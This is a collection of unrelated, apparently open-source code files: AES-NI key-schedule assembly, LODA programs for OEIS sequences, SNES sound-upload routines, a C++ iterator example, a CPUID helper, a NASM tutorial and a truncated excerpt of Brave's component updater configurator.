movups [edi],xmm2
movups [16+edi],xmm3
pxor xmm3,xmm3
movups [32+edi],xmm4
pxor xmm4,xmm4
movups [48+edi],xmm5
pxor xmm5,xmm5
lea edi,[64+edi]
movaps xmm2,xmm6
pxor xmm6,xmm6
sub eax,80
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$086cbc_dec_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$091dec1_loop_16:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$091dec1_loop_16
db 102,15,56,223,209
xorps xmm2,xmm7
movaps xmm7,xmm6
sub eax,16
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$087cbc_dec_two:
call __aesni_decrypt2
xorps xmm2,xmm7
xorps xmm3,xmm6
movups [edi],xmm2
movaps xmm2,xmm3
pxor xmm3,xmm3
lea edi,[16+edi]
movaps xmm7,xmm5
sub eax,32
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$088cbc_dec_three:
call __aesni_decrypt3
xorps xmm2,xmm7
xorps xmm3,xmm6
xorps xmm4,xmm5
movups [edi],xmm2
movaps xmm2,xmm4
pxor xmm4,xmm4
movups [16+edi],xmm3
pxor xmm3,xmm3
lea edi,[32+edi]
movups xmm7,[32+esi]
sub eax,48
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$089cbc_dec_four:
call __aesni_decrypt4
movups xmm1,[16+esi]
movups xmm0,[32+esi]
xorps xmm2,xmm7
movups xmm7,[48+esi]
xorps xmm3,xmm6
movups [edi],xmm2
xorps xmm4,xmm1
movups [16+edi],xmm3
pxor xmm3,xmm3
xorps xmm5,xmm0
movups [32+edi],xmm4
pxor xmm4,xmm4
lea edi,[48+edi]
movaps xmm2,xmm5
pxor xmm5,xmm5
sub eax,64
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$085cbc_dec_clear_tail_collected:
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
L$090cbc_dec_tail_collected:
and eax,15
jnz NEAR L$092cbc_dec_tail_partial
movups [edi],xmm2
pxor xmm0,xmm0
jmp NEAR L$081cbc_ret
align 16
; Partial final block: spill to the stack and copy only eax bytes out.
L$092cbc_dec_tail_partial:
movaps [esp],xmm2
pxor xmm0,xmm0
mov ecx,16
mov esi,esp
sub ecx,eax
; dd 2767451785 = 0xA4F3F689: "mov esi,esi ; rep movsb" (copy tail bytes)
dd 2767451785
movdqa [esp],xmm2
; Store the new IV back to the caller's ivec and scrub registers.
L$081cbc_ret:
mov esp,DWORD [16+esp]
mov ebp,DWORD [36+esp]
pxor xmm2,xmm2
pxor xmm1,xmm1
movups [ebp],xmm7
pxor xmm7,xmm7
L$076cbc_abort:
pop edi
pop esi
pop ebx
pop ebp
ret
align 16
__aesni_set_encrypt_key:
; Shared AES-NI key-schedule builder.
; Inputs:  eax = user key pointer, ecx = key size in bits (128/192/256),
;          edx = AES_KEY output.
; Returns: eax = 0 on success, -1 for a NULL pointer, -2 for bad key bits.
; Opcode blobs: db 102,15,58,223,... = aeskeygenassist,
; db 102,15,56,0,... = pshufb, db 102,15,56,221,... = aesenclast.
push ebp
push ebx
test eax,eax
jz NEAR L$093bad_pointer
test edx,edx
jz NEAR L$093bad_pointer
call L$094pic
L$094pic:
pop ebx
lea ebx,[(L$key_const-L$094pic)+ebx]
; Capability test on OPENSSL_ia32cap_P word 1 (mask 0x10000800, compare
; 0x10000000): when it matches, the "*_alt" pshufb/aesenclast schedule is
; used instead of aeskeygenassist (AVX/XOP bits per upstream aesni-x86.pl
; -- NOTE(review): confirm against the generating perl script).
lea ebp,[_OPENSSL_ia32cap_P]
movups xmm0,[eax]
xorps xmm4,xmm4
mov ebp,DWORD [4+ebp]
lea edx,[16+edx]
and ebp,268437504
cmp ecx,256
je NEAR L$09514rounds
cmp ecx,192
je NEAR L$09612rounds
cmp ecx,128
jne NEAR L$097bad_keybits
align 16
; ---- AES-128: 10 rounds ----
L$09810rounds:
cmp ebp,268435456
je NEAR L$09910rounds_alt
mov ecx,9
movups [edx-16],xmm0
db 102,15,58,223,200,1
call L$100key_128_cold
db 102,15,58,223,200,2
call L$101key_128
db 102,15,58,223,200,4
call L$101key_128
db 102,15,58,223,200,8
call L$101key_128
db 102,15,58,223,200,16
call L$101key_128
db 102,15,58,223,200,32
call L$101key_128
db 102,15,58,223,200,64
call L$101key_128
db 102,15,58,223,200,128
call L$101key_128
db 102,15,58,223,200,27
call L$101key_128
db 102,15,58,223,200,54
call L$101key_128
movups [edx],xmm0
mov DWORD [80+edx],ecx
jmp NEAR L$102good_key
align 16
; Expand one AES-128 round key from the aeskeygenassist result in xmm1.
L$101key_128:
movups [edx],xmm0
lea edx,[16+edx]
L$100key_128_cold:
shufps xmm4,xmm0,16
xorps xmm0,xmm4
shufps xmm4,xmm0,140
xorps xmm0,xmm4
shufps xmm1,xmm1,255
xorps xmm0,xmm1
ret
align 16
; AES-128 alternate schedule: pshufb + aesenclast with explicit rcon in xmm4.
L$09910rounds_alt:
movdqa xmm5,[ebx]
mov ecx,8
movdqa xmm4,[32+ebx]
movdqa xmm2,xmm0
movdqu [edx-16],xmm0
L$103loop_key128:
db 102,15,56,0,197
db 102,15,56,221,196
pslld xmm4,1
lea edx,[16+edx]
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [edx-16],xmm0
movdqa xmm2,xmm0
dec ecx
jnz NEAR L$103loop_key128
movdqa xmm4,[48+ebx]
db 102,15,56,0,197
db 102,15,56,221,196
pslld xmm4,1
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [edx],xmm0
movdqa xmm2,xmm0
db 102,15,56,0,197
db 102,15,56,221,196
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [16+edx],xmm0
mov ecx,9
mov DWORD [96+edx],ecx
jmp NEAR L$102good_key
align 16
; ---- AES-192: 12 rounds ----
L$09612rounds:
movq xmm2,[16+eax]
cmp ebp,268435456
je NEAR L$10412rounds_alt
mov ecx,11
movups [edx-16],xmm0
db 102,15,58,223,202,1
call L$105key_192a_cold
db 102,15,58,223,202,2
call L$106key_192b
db 102,15,58,223,202,4
call L$107key_192a
db 102,15,58,223,202,8
call L$106key_192b
db 102,15,58,223,202,16
call L$107key_192a
db 102,15,58,223,202,32
call L$106key_192b
db 102,15,58,223,202,64
call L$107key_192a
db 102,15,58,223,202,128
call L$106key_192b
movups [edx],xmm0
mov DWORD [48+edx],ecx
jmp NEAR L$102good_key
align 16
L$107key_192a:
movups [edx],xmm0
lea edx,[16+edx]
align 16
L$105key_192a_cold:
movaps xmm5,xmm2
L$108key_192b_warm:
shufps xmm4,xmm0,16
movdqa xmm3,xmm2
xorps xmm0,xmm4
shufps xmm4,xmm0,140
pslldq xmm3,4
xorps xmm0,xmm4
pshufd xmm1,xmm1,85
pxor xmm2,xmm3
pxor xmm0,xmm1
pshufd xmm3,xmm0,255
pxor xmm2,xmm3
ret
align 16
L$106key_192b:
movaps xmm3,xmm0
shufps xmm5,xmm0,68
movups [edx],xmm5
shufps xmm3,xmm2,78
movups [16+edx],xmm3
lea edx,[32+edx]
jmp NEAR L$108key_192b_warm
align 16
; AES-192 alternate schedule (pshufb-based, 24-byte stride).
L$10412rounds_alt:
movdqa xmm5,[16+ebx]
movdqa xmm4,[32+ebx]
mov ecx,8
movdqu [edx-16],xmm0
L$109loop_key192:
movq [edx],xmm2
movdqa xmm1,xmm2
db 102,15,56,0,213
db 102,15,56,221,212
pslld xmm4,1
lea edx,[24+edx]
movdqa xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm0,xmm3
pshufd xmm3,xmm0,255
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pxor xmm0,xmm2
pxor xmm2,xmm3
movdqu [edx-16],xmm0
dec ecx
jnz NEAR L$109loop_key192
mov ecx,11
mov DWORD [32+edx],ecx
jmp NEAR L$102good_key
align 16
; ---- AES-256: 14 rounds ----
L$09514rounds:
movups xmm2,[16+eax]
lea edx,[16+edx]
cmp ebp,268435456
je NEAR L$11014rounds_alt
mov ecx,13
movups [edx-32],xmm0
movups [edx-16],xmm2
db 102,15,58,223,202,1
call L$111key_256a_cold
db 102,15,58,223,200,1
call L$112key_256b
db 102,15,58,223,202,2
call L$113key_256a
db 102,15,58,223,200,2
call L$112key_256b
db 102,15,58,223,202,4
call L$113key_256a
db 102,15,58,223,200,4
call L$112key_256b
db 102,15,58,223,202,8
call L$113key_256a
db 102,15,58,223,200,8
call L$112key_256b
db 102,15,58,223,202,16
call L$113key_256a
db 102,15,58,223,200,16
call L$112key_256b
db 102,15,58,223,202,32
call L$113key_256a
db 102,15,58,223,200,32
call L$112key_256b
db 102,15,58,223,202,64
call L$113key_256a
movups [edx],xmm0
mov DWORD [16+edx],ecx
xor eax,eax
jmp NEAR L$102good_key
align 16
L$113key_256a:
movups [edx],xmm2
lea edx,[16+edx]
L$111key_256a_cold:
shufps xmm4,xmm0,16
xorps xmm0,xmm4
shufps xmm4,xmm0,140
xorps xmm0,xmm4
shufps xmm1,xmm1,255
xorps xmm0,xmm1
ret
align 16
L$112key_256b:
movups [edx],xmm0
lea edx,[16+edx]
shufps xmm4,xmm2,16
xorps xmm2,xmm4
shufps xmm4,xmm2,140
xorps xmm2,xmm4
shufps xmm1,xmm1,170
xorps xmm2,xmm1
ret
align 16
; AES-256 alternate schedule (pshufb-based).
L$11014rounds_alt:
movdqa xmm5,[ebx]
movdqa xmm4,[32+ebx]
mov ecx,7
movdqu [edx-32],xmm0
movdqa xmm1,xmm2
movdqu [edx-16],xmm2
L$114loop_key256:
db 102,15,56,0,213
db 102,15,56,221,212
movdqa xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm0,xmm3
pslld xmm4,1
pxor xmm0,xmm2
movdqu [edx],xmm0
dec ecx
jz NEAR L$115done_key256
pshufd xmm2,xmm0,255
pxor xmm3,xmm3
db 102,15,56,221,211
movdqa xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm1,xmm3
pxor xmm2,xmm1
movdqu [16+edx],xmm2
lea edx,[32+edx]
movdqa xmm1,xmm2
jmp NEAR L$114loop_key256
L$115done_key256:
mov ecx,13
mov DWORD [16+edx],ecx
; Success: scrub key material from registers and return 0.
L$102good_key:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
xor eax,eax
pop ebx
pop ebp
ret
align 4
L$093bad_pointer:
mov eax,-1
pop ebx
pop ebp
ret
align 4
L$097bad_keybits:
pxor xmm0,xmm0
mov eax,-2
pop ebx
pop ebp
ret
global _aes_hw_set_encrypt_key
align 16
_aes_hw_set_encrypt_key:
L$_aes_hw_set_encrypt_key_begin:
; Public entry: loads the three stack arguments ([4]=user key ptr,
; [8]=bits, [12]=AES_KEY out) into eax/ecx/edx and tail-calls the
; internal schedule builder.
%ifndef NDEBUG
; Debug builds record that this routine ran (BORINGSSL_function_hit[3])
; so tests can assert the AES-NI path was taken.
push ebx
push edx
call L$116pic
L$116pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+3-L$116pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov eax,DWORD [4+esp]
mov ecx,DWORD [8+esp]
mov edx,DWORD [12+esp]
call __aesni_set_encrypt_key
ret
global _aes_hw_set_decrypt_key
align 16
_aes_hw_set_decrypt_key:
L$_aes_hw_set_decrypt_key_begin:
; Builds a decryption schedule: expands the encryption schedule first,
; then reverses the round-key order and applies AESIMC
; (db 102,15,56,219 = aesimc) to the inner round keys.
mov eax,DWORD [4+esp]
mov ecx,DWORD [8+esp]
mov edx,DWORD [12+esp]
call __aesni_set_encrypt_key
mov edx,DWORD [12+esp]
shl ecx,4
; Propagate a non-zero (error) return from the expansion unchanged.
test eax,eax
jnz NEAR L$117dec_key_ret
; Swap the first and last round keys, then walk inward.
lea eax,[16+ecx*1+edx]
movups xmm0,[edx]
movups xmm1,[eax]
movups [eax],xmm0
movups [edx],xmm1
lea edx,[16+edx]
lea eax,[eax-16]
L$118dec_key_inverse:
movups xmm0,[edx]
movups xmm1,[eax]
db 102,15,56,219,192
db 102,15,56,219,201
lea edx,[16+edx]
lea eax,[eax-16]
movups [16+eax],xmm0
movups [edx-16],xmm1
cmp eax,edx
ja NEAR L$118dec_key_inverse
; Middle round key: InvMixColumns in place.
movups xmm0,[edx]
db 102,15,56,219,192
movups [edx],xmm0
pxor xmm0,xmm0
pxor xmm1,xmm1
xor eax,eax
L$117dec_key_ret:
ret
align 64
; Constants for the "*_alt" key-schedule paths: the first two rows are
; pshufb masks, the last two rows are round-constant seeds (1 and 0x1b).
L$key_const:
dd 202313229,202313229,202313229,202313229
dd 67569157,67569157,67569157,67569157
dd 1,1,1,1
dd 27,27,27,27
; ASCII credit string:
; "AES for Intel AES-NI, CRYPTOGAMS by <appro@openssl.org>"
db 65,69,83,32,102,111,114,32,73,110,116,101,108,32,65,69
db 83,45,78,73,44,32,67,82,89,80,84,79,71,65,77,83
db 32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115
db 115,108,46,111,114,103,62,0
segment .bss
common _OPENSSL_ia32cap_P 16
|
; A141534: Derived from the centered polygonal numbers: start with the first triangular number, then the sum of the first square number and the second triangular number, then the sum of first pentagonal number, the second square number and the third triangular number, and so on and so on...
; 1,4,11,26,55,105,184,301,466,690,985,1364,1841,2431,3150,4015,5044,6256,7671,9310,11195,13349,15796,18561,21670,25150,29029,33336,38101,43355,49130,55459,62376,69916,78115,87010,96639,107041,118256,130325,143290,157194,172081,187996,204985,223095,242374,262871,284636,307720,332175,358054,385411,414301,444780,476905,510734,546326,583741,623040,664285,707539,752866,800331,850000,901940,956219,1012906,1072071,1133785,1198120,1265149,1334946,1407586,1483145,1561700,1643329,1728111,1816126,1907455,2002180,2100384,2202151,2307566,2416715,2529685,2646564,2767441,2892406,3021550,3154965,3292744,3434981,3581771,3733210,3889395,4050424,4216396,4387411,4563570,4744975,4931729,5123936,5321701,5525130,5734330,5949409,6170476,6397641,6631015,6870710,7116839,7369516,7628856,7894975,8167990,8448019,8735181,9029596,9331385,9640670,9957574,10282221,10614736,10955245,11303875,11660754,12026011,12399776,12782180,13173355,13573434,13982551,14400841,14828440,15265485,15712114,16168466,16634681,17110900,17597265,18093919,18601006,19118671,19647060,20186320,20736599,21298046,21870811,22455045,23050900,23658529,24278086,24909726,25553605,26209880,26878709,27560251,28254666,28962115,29682760,30416764,31164291,31925506,32700575,33489665,34292944,35110581,35942746,36789610,37651345,38528124,39420121,40327511,41250470,42189175,43143804,44114536,45101551,46105030,47125155,48162109,49216076,50287241,51375790,52481910,53605789,54747616,55907581,57085875,58282690,59498219,60732656,61986196,63259035,64551370,65863399,67195321,68547336,69919645,71312450,72725954,74160361,75615876,77092705,78591055,80111134,81653151,83217316,84803840,86412935,88044814,89699691,91377781,93079300,94804465,96553494,98326606,100124021,101945960,103792645,105664299,107561146,109483411,111431320,113405100,115404979,117431186,119483951,121563505,123670080,125803909,127965226,130154266,132371265,134616460,136890089,139192391,141523606,143883975,146273740,148693144,151142431,153621846,156131635,158672045,161243324,163845721,
166479486,169144870
; LODA program for A141534; the result is left in $1.
mov $12,$0
mov $14,$0
add $14,1
; Outer loop: run n+1 times, with $0 taking values 0..n.
lpb $14
clr $0,12
mov $0,$12
sub $14,1
sub $0,$14
mov $9,$0
mov $11,$0
add $11,1
; Inner loop: accumulate one polygonal-style term per k = 0..$9 into $10
; ($2 = C(k,2); $5 builds the summand -- see the sequence description).
lpb $11
mov $0,$9
sub $11,1
sub $0,$11
mov $2,$0
bin $2,2
mov $5,$0
add $5,$0
trn $5,5
add $5,$0
add $5,$2
add $5,1
add $10,$5
lpe
; $13 accumulates the partial sums across the outer loop.
add $13,$10
lpe
mov $1,$13
|
; A263941: Minimal most likely sum for a roll of n 8-sided dice.
; 1,9,13,18,22,27,31,36,40,45,49,54,58,63,67,72,76,81,85,90,94,99,103,108,112,117,121,126,130,135,139,144,148,153,157,162,166,171,175,180,184,189,193,198,202,207,211,216,220,225
; LODA program for A263941; the result is left in $1.
; $2 = (9*n - 1) / 2 after the first five instructions ($0 holds 8*n - 1).
mov $2,$0
mul $0,8
sub $0,1
mov $1,1
add $2,$0
div $2,2
; For n > 0 add $2 + 4 to the initial 1; n = 0 leaves the answer at 1.
; NOTE(review): relies on LODA's two-argument lpb semantics -- confirm.
lpb $0,1
mov $0,2
add $1,$2
add $1,4
lpe
|
.include "header.inc"
.include "snesregs.inc"
.include "misc_macros.inc"
.include "zeropage.inc"
.include "puzzles.inc"
.include "grid.inc"
.bank 0 slot 1
.ramsection "sound_variables" SLOT RAM_SLOT
; Last handshake value written to APUIO0; seeded with $CC by sound_loadApu.
kick: db
.ends
.16BIT
.section "apu_payload" FREE
; Destination/entry addresses inside APU RAM. Per the uploader comments
; below, the destination should be >= $0200 (above the SPC700 stack and
; I/O ports) and the entry point below $FFC0.
apu_dst_address: .dw 200h
apu_entry_point: .dw 200h
.ends
.section "sound_code" FREE
; CPU-side aliases for the APU I/O ports (APUIO1 doubles as command/data).
.define APU_HANDSHAKE APUIO0
.define APU_COMMAND APUIO1
.define APU_DATA APUIO1
.define APU_DST_ADDR APUIO2
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Load the APU program
;
; based on Uploader pseudo code from the fullsnes documentation
; Uploads the SPC700 program (apu_payload) into APU RAM and starts it,
; following the fullsnes IPL-ROM uploader protocol. Leaves `kick` primed
; for subsequent sound_sendCommand calls. Clobbers nothing (pushall/popall).
sound_loadApu:
pushall
A8
XY16
ldx #0
; Wait until Word[2140h]=BBAAh (IPL ROM ready signature)
@wait_bbaa:
ldy APU_HANDSHAKE
cpy #$BBAA
bne @wait_bbaa
; kick=CCh ;start-code for first command
lda #$cc
sta kick
@next_block:
ldy apu_dst_address
sty APU_DST_ADDR ; usually 200h or higher (above stack and I/O ports)
lda #1
sta APU_COMMAND ; command=transfer (can be any non-zero value)
lda kick
sta APU_HANDSHAKE ; start command (CCh on first block)
@wait_handshake:
lda APU_HANDSHAKE
cmp kick
bne @wait_handshake
; Send the payload one byte at a time; each byte is acknowledged by the
; IPL ROM echoing the index LSB back through the handshake port.
@blockdataloop:
lda apu_payload.L, X
sta APU_DATA ; send data byte
txa
sta APU_HANDSHAKE ; send index LSB (mark data available)
@waitDataAck:
cmp APU_HANDSHAKE
bne @waitDataAck
inx
cpx #_sizeof_apu_payload
bne @blockdataloop
; kick=(index+2 AND FFh) OR 1 ;-kick for next command (must be bigger than last index+1, and must be non-zero)
; NOTE(review): A already holds the size LSB from the loop's txa, so the
; adc below adds it a second time (kick ~= 2*size+2|1, not size+2|1).
; Harmless as long as the 8-bit result still differs from the last
; handshake value -- confirm for payloads near a wrap boundary.
txa
clc
adc #<_sizeof_apu_payload
adc #2
ora #1
sta kick
@startit:
ldy apu_entry_point
sty APU_DST_ADDR ; entrypoint, must be below FFC0h (ROM region)
stz APU_COMMAND ; command=entry (must be zero value)
lda kick
sta APU_HANDSHAKE
@waitStartAck:
cmp APU_HANDSHAKE
bne @waitStartAck
@done:
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Send a command. Command in 8-bit A.
;
sound_sendCommand:
pushall
A8
; The command id arrives in (8-bit) A and is written straight to APUIO1.
sta APU_COMMAND
; Bump the handshake value so the APU sees a new, changing kick.
inc kick
lda kick
sta APU_HANDSHAKE
@waitack:
; A still holds the kick value written above; spin until the APU echoes it.
cmp APU_HANDSHAKE
bne @waitack
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'error' sound to be played
;
sound_effect_error:
pushall
A8
lda #$10 ; Error -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'write' sound to be played
;
sound_effect_write:
pushall
A8
lda #$11 ; 'write' sound -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'erase' sound to be played
;
sound_effect_erase:
pushall
A8
lda #$12 ; 'erase' sound -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'click' sound to be played
;
; Two aliases for the same effect.
sound_effect_menuselect:
sound_effect_click:
pushall
A8
lda #$13 ; 'click' sound -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'back' sound to be played
;
sound_effect_back:
pushall
A8
lda #$14 ; 'back' sound -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'solved' sound to be played
;
sound_effect_solved:
pushall
A8
lda #$15 ; 'solved' sound -- command id interpreted by the APU-side program
jsr sound_sendCommand
popall
rts
.ends
.bank 5
.section "apu program" FREE
; SPC700 binary uploaded by sound_loadApu.
apu_payload: .incbin "sound/sndcode.bin"
apu_dummy: .db 0 ; for sizeof
.ends
|
; A033280: Number of diagonal dissections of a convex (n+8)-gon into n+1 regions.
; Submitted by Jamie Morken(s4)
; 1,27,385,4004,34398,259896,1790712,11511720,70114902,409003595,2303105805,12593413560,67173369900,350777861280,1798432526880,9073909567440,45140379405030,221768094898350,1077403874372826,5182007298602904,24699073588138180,116759256962107760
; LODA program for A033280; the result is left in $0.
; Computes C(n+5,4) * C(2n+7,n) / 5 (bin = binomial coefficient).
mov $1,7
add $1,$0
; $2 = 2n+7, $1 = n+5
mov $2,$0
add $2,$1
sub $1,2
bin $1,4
bin $2,$0
mul $1,$2
mov $0,$1
div $0,5
|
/// @copyright
/// Copyright (C) 2020 Assured Information Security, Inc.
///
/// @copyright
/// Permission is hereby granted, free of charge, to any person obtaining a copy
/// of this software and associated documentation files (the "Software"), to deal
/// in the Software without restriction, including without limitation the rights
/// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
/// copies of the Software, and to permit persons to whom the Software is
/// furnished to do so, subject to the following conditions:
///
/// @copyright
/// The above copyright notice and this permission notice shall be included in
/// all copies or substantial portions of the Software.
///
/// @copyright
/// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
/// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
/// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
/// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
/// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
/// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
/// SOFTWARE.
#include <bsl/string_view.hpp>
#include <bsl/debug.hpp>
namespace bsl
{
/// <!-- description -->
/// @brief Provides the example's main function
///
inline void
example_contiguous_iterator_gt_equals() noexcept
{
bsl::string_view const str{"Hello"};
bsl::string_view::iterator_type const iter1{str.begin()};
bsl::string_view::iterator_type const iter2{str.begin()};
bsl::string_view::iterator_type const iter3{str.end()};
if (iter1 == iter2) {
bsl::print() << "success\n";
}
if (iter1 != iter3) {
bsl::print() << "success\n";
}
if (iter1 < iter3) {
bsl::print() << "success\n";
}
if (iter1 <= iter2) {
bsl::print() << "success\n";
}
if (iter3 > iter1) {
bsl::print() << "success\n";
}
if (iter3 >= iter1) {
bsl::print() << "success\n";
}
}
}
|
; A159287: Expansion of x^2/(1-x^2-2*x^3)
; Submitted by Jamie Morken(s4)
; 0,0,1,0,1,2,1,4,5,6,13,16,25,42,57,92,141,206,325,488,737,1138,1713,2612,3989,6038,9213,14016,21289,32442,49321,75020,114205,173662,264245,402072,611569,930562,1415713,2153700,3276837,4985126,7584237,11538800,17554489,26707274,40632089,61816252,94046637,143080430,217679141,331173704,503840001,766531986,1166187409,1774211988,2699251381,4106586806,6247675357,9505089568,14460848969,22000440282,33471028105,50922138220,77471908669,117864194430,179316185109,272808011768,415044573969,631440381986
; LODA program for A159287 (expansion of x^2/(1-x^2-2x^3)); result in $0.
; Iterates the recurrence n times, carrying the rolling state in $1..$3
; and accumulating the answer in $2.
mov $1,1
lpb $0
sub $0,1
sub $2,$1
add $3,$1
add $1,$2
sub $1,$3
mul $1,2
add $2,$3
lpe
mov $0,$2
|
BITS 64
global getFeatureInfo
; getFeatureInfo(out):
; Executes CPUID leaf 1 and stores ECX, EDX, EAX, EBX (in that order) into
; the 16-byte buffer pointed to by RDI. RBX, which CPUID clobbers, is
; saved and restored around the call.
getFeatureInfo:
push rbx
mov eax, 0x01
cpuid
mov dword [rdi], ecx
mov dword [rdi+4], edx
mov dword [rdi+8], eax
mov dword [rdi+12], ebx
pop rbx
ret
|
; -------------------------------------------------------------
; nasm -f elf64 -o 00_arithmetics_if.o 00_arithmetics_if.asm
; ld -o 00_arithmetics_if 00_arithmetics_if.o
; ./00_arithmetics_if
; -------------------------------------------------------------
section .data
; define constants
num1: equ 100
num2: equ 50
; initialize message
myMessage: db "Correct"
; length computed by the assembler so it always matches the string
; (the previous hard-coded 15 wrote 8 bytes of garbage past the 7-byte
; message)
myMessageLen: equ $ - myMessage
section .text
global _start
_start:
; copy num1's value to rax (temporary register)
mov rax, num1
; copy num2's value to rbx
mov rbx, num2
; put rax + rbx into rax
add rax, rbx
; compare rax and 150
cmp rax, 150
; go to .exit label if rax and 150 are not equal
jne .exit
; go to .correctSum label if rax and 150 are equal
jmp .correctSum
; Print message that sum is correct
.correctSum:
; write syscall
mov rax, 1
; file descriptor, standard output
mov rdi, 1
; message address
mov rsi, myMessage
; length of message
mov rdx, myMessageLen
; call write syscall
syscall
; exit from program
jmp .exit
; exit procedure
.exit:
; exit syscall
mov rax, 60
; exit code
mov rdi, 0
; call exit syscall
syscall
|
// Copyright 2016 Brave Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "brave/browser/component_updater/brave_component_updater_configurator.h"
#include <stdint.h>
#include <string>
#include <vector>
#include "base/command_line.h"
#include "base/strings/sys_string_conversions.h"
#include "base/version.h"
#if defined(OS_WIN)
#include "base/win/win_util.h"
#endif
#include "chrome/browser/browser_process.h"
#include "components/component_updater/configurator_impl.h"
#include "components/prefs/pref_service.h"
#include "components/update_client/component_patcher_operation.h"
#include "net/url_request/url_request_context_getter.h"
namespace component_updater {
namespace {
// Brave's update_client::Configurator implementation. Wraps Chromium's
// ConfiguratorImpl and overrides what Brave needs: its own extension
// update/ping server, a fixed "stable" channel, no CUP signing against
// the Brave server, and deltas disabled.
class BraveConfigurator : public update_client::Configurator {
public:
BraveConfigurator(const base::CommandLine* cmdline,
net::URLRequestContextGetter* url_request_getter,
bool use_brave_server);
// update_client::Configurator overrides.
int InitialDelay() const override;
int NextCheckDelay() const override;
int OnDemandDelay() const override;
int UpdateDelay() const override;
std::vector<GURL> UpdateUrl() const override;
std::vector<GURL> PingUrl() const override;
std::string GetProdId() const override;
base::Version GetBrowserVersion() const override;
std::string GetChannel() const override;
std::string GetBrand() const override;
std::string GetLang() const override;
std::string GetOSLongName() const override;
std::string ExtraRequestParams() const override;
std::string GetDownloadPreference() const override;
net::URLRequestContextGetter* RequestContext() const override;
scoped_refptr<update_client::OutOfProcessPatcher> CreateOutOfProcessPatcher()
const override;
bool EnabledDeltas() const override;
bool EnabledComponentUpdates() const override;
bool EnabledBackgroundDownloader() const override;
bool EnabledCupSigning() const override;
PrefService* GetPrefService() const override;
update_client::ActivityDataService* GetActivityDataService() const override;
bool IsPerUserInstall() const override;
std::vector<uint8_t> GetRunActionKeyHash() const override;
private:
friend class base::RefCountedThreadSafe<BraveConfigurator>;
// Chromium's default configurator; all unmodified queries delegate here.
ConfiguratorImpl configurator_impl_;
// When true, update/ping URLs target Brave's server and CUP is disabled.
bool use_brave_server_;
// Ref-counted: destroyed via Release(), hence the non-public destructor.
~BraveConfigurator() override {}
};
// Allows the component updater to use non-encrypted communication with the
// update backend. The security of the update checks is enforced using
// a custom message signing protocol and it does not depend on using HTTPS.
// Passes require_encryption=false to ConfiguratorImpl: per the comment
// above, update checks are authenticated by message signing, not HTTPS.
